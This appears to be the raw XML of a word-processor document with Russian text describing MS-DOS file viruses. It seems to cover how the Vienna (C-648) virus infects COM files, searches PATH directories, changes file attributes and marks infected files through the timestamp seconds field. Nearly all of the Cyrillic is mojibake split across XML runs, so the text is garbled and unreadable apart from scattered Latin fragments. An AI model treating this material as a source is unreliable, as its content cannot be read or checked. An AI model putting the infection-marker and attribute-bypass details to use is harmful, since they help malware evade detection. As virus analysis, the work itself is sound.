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������� �������� ���������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����� ��������  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭�����  ࠧ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樯���쭮 ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� �� ⨯ �ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��������� � MS DOS:  COM,  EXE,  OVL � �.�. ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮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쥪</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">COM � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE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ᢥ����� � ������� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਢ�����  �  �ਫ������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢫���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠢���� 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��⪠ ����� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �����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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㥬�� ���⮩�� �� ����㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� ��⮨� � ����㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥣ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ॣ���஢ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騬� ����� ����㧪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��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 xml:space="preserve">쭠� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ��稭����� � ������� ���室�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室�饩 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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騥 � ��砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ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 xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� ����� ���������� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�� ⥫�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  ���⮢  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� � ����� ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� ���室 �� ��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>⢥����� ����.  ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯠�� ����設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢮ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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M-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �� ��. ���� � ⮬, �� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��� ⥫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ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ���� ��� ����� ������ ����  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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  <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ���뢠��� ����樮���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨬ� �ணࠬ��஢�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫪� ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ����� �१ ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥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饥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᬥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஥ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� � ����� �� ॣ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ����� ����� �ਬ�⨢�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>: 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뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮��� ⥫� � ����� ��ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  ���  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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᪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 ������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���� �� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ���, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯠�� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-1813. � �⮬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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭�������  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室����  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﭨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� �ணࠬ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樮���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨬ�� ��� ��� ������ ࠧ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㥬� �� ���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ਢ������ ���ᠭ�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬ �� ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室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ਠ�� ����ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">楫�� ��⥬�⨧�樨 䠩����  ������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ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��㯯</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  ��� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ⠪ � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஭������᪮� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">浪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�� ��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.1. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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᪠� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠢��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯯� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">१������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ����� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� � ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-648. � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६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砥� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��,  �������� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� �� ������ 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᪨ ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- �-648.  �������� �⠬�� �⫨����� ��  ��⮤� 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᪮� ����������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� 㭨�⮦���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ��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 �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ��१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪� ����樮���� ��⥬�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���� �� �⠬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ᯮ���� ��� �⮩ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">楫� ⥪�襥 ���祭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠩��� (�.����), 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����� �� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) - ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭�� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮧ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬�� � ������� 534,  623,  6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. ������ ����� �-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ienna - ����; Time Bomb - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>; DOS-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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-648 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ��᫥ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠ ��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����� ��⨢������ � ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-�����.  �᫨  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-���⢠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�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">।������ ������ �६��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।� ��᫥���� ��� ��⮢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筮�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠢����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤 ��� �� ����� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>), 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ࠦ���� �ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ঠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饩�� � �⮬ 䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �-648 ��⠢��� �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⮩ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"⥯���� �����"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⥬  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ� �ணࠬ�� � ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饬 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��ᯮ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" ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ �ணࠬ�� �� ����� ���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭������ ���  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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨 � ��砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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饣� 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ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-648 - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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⨯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭪樮����� �� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⥣�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">- ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-����� �� PATH. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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. �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠����  �  �����  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��  �  �����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  � ���� �� ���� COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ������� ���室� �� ⥫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⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">648 ���⮢, ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ਡ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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ࠧ��� ��ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- 10 ���⮢ (0Ah), ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨬ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- (FA0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⫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ᯮ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訥 ���� ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">६��� ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ�����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�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������ � �������,  �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥����� ���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饬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ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤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᪥  ����஢�����  �ணࠬ��  �ࠢ����� ᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� ����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 �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稢 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ����� ��⠭�������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� ������� ��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 �����⢫�� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM �� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠� � 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⠫����, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">楯������ � ������� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PATH. �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">宦����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠪��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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०�� �ᥣ� �஢���� ��� �६� ᮧ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ��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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ�� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 ��� 䠩� ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. �᫨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� �⬥祭 ��� ��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 ����� ����� ���⮢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᬠ�ਢ����� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"��⥭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⢠" � ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯠�� � ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �� �⮬ ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ����  �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠬ�� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE (��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稭��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Z"), �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訡�筮 ��� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">७�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM.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䠩�� � ��砥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭨�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⬥���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬� READ ONLY � HIDD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DOS �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ��䥪⨢��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��᪮��� ����� ����� ��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砫� ����� ���������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� ᮧ����� ��ࠦ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䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��⥬  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਡ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>READ ONLY,  �᫨ �� �� ��⠭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 䠩� �� ������ � ���뢠�� ⥪�饥  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �᫨  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠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  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">21-2� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮤ�ন��� ॣ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">DH </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন� � ��᫥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㫨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�.�. ��⥬�� ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0, 8, 16, 24, 32, 40, 48 ��� 56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㭤</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>),  �  ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
